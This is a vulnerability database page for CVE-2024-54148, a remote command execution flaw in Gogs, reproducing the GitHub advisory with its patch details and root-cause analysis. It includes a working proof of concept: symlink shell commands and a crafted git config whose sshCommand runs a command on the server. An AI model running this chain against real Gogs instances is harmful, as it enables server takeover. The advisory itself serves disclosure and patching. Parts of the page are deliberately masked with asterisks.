9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-54148

GHSA ID

GHSA-r7j8-5h9c-f6fx

EPSS Score

0.52494%

CWE

CWE-22

Published

12/23/2024

Updated

12/26/2024

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-54148

CVE-2024-54148:
Remote Command Execution in file editing in gogs

Impact

The malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server.

Patches

Editing symlink while changing the file name has been prohibited via the repository web editor (https://github.com/gogs/gogs/pull/7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.

References

n/a

Proof of Concept

Create two repositories, upload something to the first repository, edit any file, and save it on the webpage.

In the second repository, create a symbolic link to the file you need to edit:

$ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test
$ ls -la
total 8
drwxr-xr-x   5 dd  staff  160 Oct 27 19:09 .
drwxr-xr-x   4 dd  staff  128 Oct 27 19:06 ..
drwxr-xr-x  12 dd  staff  384 Oct 27 19:09 .git
-rw-r--r--   1 dd  staff   12 Oct 27 19:06 README.md
lrwxr-xr-x   1 dd  staff   44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config
$ git add .
$ git commit -m 'ddd'
$ git push -f

Go back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed)

[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
url = [git@github.com](mailto:git@github.com):torvalds/linux.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master

Go back to the first repo, edit something, and commit again, you can notice a file called /tmp/poc created on the server.

For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.

(GitHub Advisory)

9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-54148

GHSA ID

GHSA-r7j8-5h9c-f6fx

EPSS Score

0.52494%

CWE

CWE-22

Published

12/23/2024

Updated

12/26/2024

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
gogs.io/gogs	go	< 0.13.1	0.13.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from insufficient symlink validation during file rename operations in the web editor. The patch adds two critical symlink checks:

When handling new file paths (entry.IsSymlink() check)
When handling existing files during renames (entry.IsSymlink() check on oldTreePath)

The original vulnerable code in editFilePost only checked the new file path for symlinks, but didn't verify if the original file being renamed (oldTreePath) was a symlink. This allowed attackers to modify symlink targets by renaming them, bypassing security restrictions. The function's failure to validate both old and new paths for symlink status directly enabled the path traversal and RCE chain.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Imp**t T** m*li*ious us*r is **l* to *ommit *n* **it * *r**t** symlink *il* to * r*pository to **in SS* ****ss to t** s*rv*r. ### P*t***s **itin* symlink w*il* ***n*in* t** *il* n*m* **s ***n pro*i*it** vi* t** r*pository w** **itor (*ttps://

Reasoning

T** vuln*r**ility st*ms *rom insu**i*i*nt symlink v*li**tion *urin* *il* r*n*m* op*r*tions in t** w** **itor. T** p*t** ***s two *riti**l symlink ****ks: *. W**n **n*lin* n*w *il* p*t*s (`*ntry.IsSymlink()` ****k) *. W**n **n*lin* *xistin* *il*s *uri

9.8

Basic Information

Concerned about an active attack path?

CVE-2024-54148: Remote Command Execution in file editing in gogs

Impact

Patches

Workarounds

References

Proof of Concept

For more information

9.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2024-54148:
Remote Command Execution in file editing in gogs

Vulnerability Intelligence
Miggo AI